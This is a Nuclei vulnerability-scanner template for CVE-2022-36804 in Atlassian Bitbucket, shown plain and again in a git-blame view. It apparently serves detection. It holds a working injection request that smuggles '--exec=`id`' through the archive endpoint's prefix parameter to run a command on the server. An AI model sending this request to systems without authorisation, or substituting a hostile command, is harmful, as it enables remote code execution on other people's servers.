nuclei-templates/cves/2022/CVE-2022-36804.yaml

id: CVE-2022-36804

info:
  name: Atlassian Bitbucket Command Injection Vulnerability
  author: DhiyaneshDk,tess,sullo
  severity: high
  description: |
    Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request.
  reference:
    - https://github.com/notdls/CVE-2022-36804
    - https://nvd.nist.gov/vuln/detail/CVE-2022-36804
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
    - https://jira.atlassian.com/browse/BSERV-13438
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-36804
    cwe-id: CWE-77
  metadata:
    shodan-query: http.component:"BitBucket"
  tags: cve,cve2022,bitbucket,atlassian

variables:
  data: '{{rand_base(5)}}'

requests:
  - raw:
      - |
        GET /rest/api/latest/repos HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /rest/api/latest/projects/{{key}}/repos/{{slug}}/archive?filename={{data}}&at={{data}}&path={{data}}&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1
        Host: {{Hostname}}

    iterate-all: true
    extractors:
      - type: json # type of the extractor
        part: body
        name: key
        json:
          - '.["values"] | .[] | .["project"] | .key'
        internal: true

      - type: json # type of the extractor
        part: body
        name: slug
        json:
          - '.["values"] | .[]  | .slug'
        internal: true

      - type: regex
        group: 1
        regex:
          - 'uid=.*\(([a-z]+)\):'

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "com.atlassian.bitbucket.scm.CommandFailedException"

      - type: status
        status:
          - 500
Create CVE-2022-36804.yaml (#5419) * Create CVE-2022-36804.yaml * Update CVE-2022-36804.yaml * Update CVE-2022-36804.yaml * Update CVE-2022-36804.yaml * Added random base + key & slug iteration with strict matcher and cmd extractor Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-09-19 22:05:26 +00:00			`id: CVE-2022-36804`

			`info:`
			`name: Atlassian Bitbucket Command Injection Vulnerability`
			`author: DhiyaneshDk,tess,sullo`
Auto Generated CVE annotations [Mon Sep 19 22:22:46 UTC 2022] :robot: 2022-09-19 22:22:46 +00:00			`severity: high`
Create CVE-2022-36804.yaml (#5419) * Create CVE-2022-36804.yaml * Update CVE-2022-36804.yaml * Update CVE-2022-36804.yaml * Update CVE-2022-36804.yaml * Added random base + key & slug iteration with strict matcher and cmd extractor Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-09-19 22:05:26 +00:00			`description: \|`
			`Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request.`
			`reference:`
			`- https://github.com/notdls/CVE-2022-36804`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-36804`
			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804`
			`- https://jira.atlassian.com/browse/BSERV-13438`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 8.8`
			`cve-id: CVE-2022-36804`
			`cwe-id: CWE-77`
			`metadata:`
			`shodan-query: http.component:"BitBucket"`
			`tags: cve,cve2022,bitbucket,atlassian`

			`variables:`
			`data: '{{rand_base(5)}}'`

			`requests:`
			`- raw:`
			`- \|`
			`GET /rest/api/latest/repos HTTP/1.1`
			`Host: {{Hostname}}`

			`- \|`
			`GET /rest/api/latest/projects/{{key}}/repos/{{slug}}/archive?filename={{data}}&at={{data}}&path={{data}}&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1`
			`Host: {{Hostname}}`

			`iterate-all: true`
			`extractors:`
			`- type: json # type of the extractor`
			`part: body`
			`name: key`
			`json:`
			`- '.["values"] \| .[] \| .["project"] \| .key'`
			`internal: true`

			`- type: json # type of the extractor`
			`part: body`
			`name: slug`
			`json:`
			`- '.["values"] \| .[] \| .slug'`
			`internal: true`

			`- type: regex`
			`group: 1`
			`regex:`
			`- 'uid=.*\(([a-z]+)\):'`

			`stop-at-first-match: true`
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- "com.atlassian.bitbucket.scm.CommandFailedException"`

			`- type: status`
			`status:`
			`- 500`